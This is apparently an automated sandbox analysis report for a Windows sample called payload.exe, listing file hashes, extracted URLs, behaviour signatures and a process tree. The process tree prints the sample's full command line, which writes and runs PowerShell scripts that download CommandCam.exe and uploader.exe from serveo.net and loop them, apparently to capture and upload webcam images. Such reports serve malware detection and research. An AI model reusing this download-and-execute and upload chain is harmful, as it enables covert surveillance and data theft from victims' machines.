Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
26/03/2024, 04:39
Static task
static1
Behavioral task
behavioral1
Sample
payload.exe
Resource
win10v2004-20240226-en
General
-
Target
payload.exe
-
Size
113KB
-
MD5
fe8ec3e67ce5fd574c3e4f2317aa81be
-
SHA1
8128adf325c80eff2532dcfd2e725f7db13cb720
-
SHA256
f24090ed6e8c1c8fd39072d623863a60135b2a402bc8630f299639244919d910
-
SHA512
84bcb7d555957a17e9995507b3686044b8d41385c1b1879a5bab10093df9ec2ee91acd2cf1ca0c4a5df4dddd638da234493f41158e1f87fe156aa090a900ada3
-
SSDEEP
1536:4OhdoS0GQM+dQbSty+Oq1n//+RGDAaxrRNvR4y7P9rvL:4qdotZM+fDn/CGRNfx
Malware Config
Extracted
http://serveo.net:3697/CommandCam.exe
http://serveo.net:3697/uploader.exe
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 23 1740 powershell.exe 32 1740 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
pid Process 3500 CommandCam.exe 2948 uploader.exe 748 CommandCam.exe 1312 uploader.exe 1472 CommandCam.exe 1672 uploader.exe -
Kills process with taskkill 2 IoCs
pid Process 2104 taskkill.exe 3400 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 1740 powershell.exe 1740 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe 3700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1740 powershell.exe Token: SeDebugPrivilege 3700 powershell.exe Token: SeDebugPrivilege 2104 taskkill.exe Token: SeDebugPrivilege 3400 taskkill.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 3976 wrote to memory of 716 3976 payload.exe 89 PID 3976 wrote to memory of 716 3976 payload.exe 89 PID 3976 wrote to memory of 716 3976 payload.exe 89 PID 716 wrote to memory of 1648 716 cmd.exe 90 PID 716 wrote to memory of 1648 716 cmd.exe 90 PID 716 wrote to memory of 1648 716 cmd.exe 90 PID 716 wrote to memory of 1740 716 cmd.exe 91 PID 716 wrote to memory of 1740 716 cmd.exe 91 PID 716 wrote to memory of 1740 716 cmd.exe 91 PID 716 wrote to memory of 3700 716 cmd.exe 100 PID 716 wrote to memory of 3700 716 cmd.exe 100 PID 716 wrote to memory of 3700 716 cmd.exe 100 PID 3700 wrote to memory of 3500 3700 powershell.exe 103 PID 3700 wrote to memory of 3500 3700 powershell.exe 103 PID 3700 wrote to memory of 3500 3700 powershell.exe 103 PID 3700 wrote to memory of 2948 3700 powershell.exe 104 PID 3700 wrote to memory of 2948 3700 powershell.exe 104 PID 3700 wrote to memory of 2948 3700 powershell.exe 104 PID 3700 wrote to memory of 2104 3700 powershell.exe 119 PID 3700 wrote to memory of 2104 3700 powershell.exe 119 PID 3700 wrote to memory of 2104 3700 powershell.exe 119 PID 3700 wrote to memory of 748 3700 powershell.exe 120 PID 3700 wrote to memory of 748 3700 powershell.exe 120 PID 3700 wrote to memory of 748 3700 powershell.exe 120 PID 3700 wrote to memory of 1312 3700 powershell.exe 121 PID 3700 wrote to memory of 1312 3700 powershell.exe 121 PID 3700 wrote to memory of 1312 3700 powershell.exe 121 PID 3700 wrote to memory of 3400 3700 powershell.exe 131 PID 3700 wrote to memory of 3400 3700 powershell.exe 131 PID 3700 wrote to memory of 3400 3700 powershell.exe 131 PID 3700 wrote to memory of 1472 3700 powershell.exe 132 PID 3700 wrote to memory of 1472 3700 powershell.exe 132 PID 3700 wrote to memory of 1472 3700 powershell.exe 132 PID 3700 wrote to memory of 1672 3700 powershell.exe 133 PID 3700 wrote to memory of 1672 3700 powershell.exe 133 PID 3700 wrote to memory of 1672 3700 powershell.exe 133
Processes
-
C:\Users\Admin\AppData\Local\Temp\payload.exe"C:\Users\Admin\AppData\Local\Temp\payload.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd.exe /c cd %USERPROFILE%\ & echo (New-Object System.Net.WebClient).DownloadFile('http://serveo.net:3697/CommandCam.exe', 'CommandCam.exe') > %USERPROFILE%\getcc.ps1 & echo (New-Object System.Net.WebClient).DownloadFile('http://serveo.net:3697/uploader.exe', 'uploader.exe') >> %USERPROFILE%\getcc.ps1 & cd %USERPROFILE%\ & powershell -ExecutionPolicy ByPass -File %USERPROFILE%\getcc.ps1 & echo while ($true) { > %USERPROFILE%\sc.ps1 & echo start -NoNewWindow CommandCam.exe -Wait >> %USERPROFILE%\sc.ps1 & echo start -NoNewWindow uploader.exe >> %USERPROFILE%\sc.ps1 & echo sleep 60 >> %USERPROFILE%\sc.ps1 & echo taskkill /F /IM uploader.exe } >> %USERPROFILE%\sc.ps1 & cd %USERPROFILE%\ & powershell -ExecutionPolicy ByPass -File %USERPROFILE%\sc.ps1 & exit2⤵
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\SysWOW64\cmd.execmd.exe /c cd C:\Users\Admin\3⤵PID:1648
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy ByPass -File C:\Users\Admin\getcc.ps13⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy ByPass -File C:\Users\Admin\sc.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Users\Admin\CommandCam.exe"CommandCam.exe"4⤵
- Executes dropped EXE
PID:3500
-
-
C:\Users\Admin\uploader.exe"uploader.exe"4⤵
- Executes dropped EXE
PID:2948
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM uploader.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
C:\Users\Admin\CommandCam.exe"CommandCam.exe"4⤵
- Executes dropped EXE
PID:748
-
-
C:\Users\Admin\uploader.exe"uploader.exe"4⤵
- Executes dropped EXE
PID:1312
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\system32\taskkill.exe" /F /IM uploader.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
-
C:\Users\Admin\CommandCam.exe"CommandCam.exe"4⤵
- Executes dropped EXE
PID:1472
-
-
C:\Users\Admin\uploader.exe"uploader.exe"4⤵
- Executes dropped EXE
PID:1672
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
16KB
MD52e12ce080ac7587bd8364fdf159136d6
SHA1b5241dffc38d8cbb26556c3bc8fee3e45bf82770
SHA256b7d50218585d0d7390733657cf276eb7a1982be7df72a9abcc9d12563c0d9cf8
SHA5127533ef60897ef8247db89d5b45d21d3c1bffd65389226b4980c52e56a60f42fbd0377eea894f29d0d751234d1802c775b033e0cab0e029ff603c3afab364274b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
64KB
MD5ea678b48940aebe8fbf9a189949fc4a3
SHA1bc831f699b16345877a0fb5cd49ee9949825e194
SHA2565918f85960da8dee6784b2a75eb1e9fa81e1baf6c1727215933653df3f4e2dfb
SHA51218e726cf62bc4e987fca0bd5c57dd0f8171a8f376cd37c58a18da6d8e2b33890223735b41ce4c3f6f0247dcfca8b803d506182687863f5d7015b3ff46f9b8415
-
Filesize
216B
MD576628a08298a8736289e2346f2856700
SHA1a8c71d6df89e8ea6c25f51bcd412de88df7e5105
SHA2569bafdcd2cbfd8c7607c2be2ef5376764e1870f276142bb7cf4e7c291f210c02e
SHA5128d79bdbaa5f0a1013460bc79382a6a243110fc3d7e1271dd5232ceec9ca8321933c7f2de65cb3de87d295ed4176c3437b7bae92b96bbc1aa09b7fbe4f06925bd
-
Filesize
143B
MD52a36e50db28701fa952161ad34039c4c
SHA1e3e8259615eeb2432cd81396679fa137481c3150
SHA2565704ba2006acaeb07f0817a67f03c128feb90237fec1638b5b92ed178647d104
SHA5126a41b172f88f669bb6a2f476187492e200a41dc8b7bdaacfaab8db0d1c3dd65c3a387ad3151dd79fe3c481601763dd4a1164ba93541160a288edc0688c8e6fda
-
Filesize
1009KB
MD513f7e957f5ac639b5852bd1ca821c11e
SHA1aa9fdff1d2a8bf207f446c81f39a40c70edd9ab1
SHA256cc8e24475ba9179e141def6493611274046fff3d0de544672159c25a3351c350
SHA51238dacec8bc5185d01190454f65f90e45c53b5deaa7692f0b9879163a599e86ef4b579c626fee2e029c9311be9852b98526a89af3e6d0073785f84bd1714d9361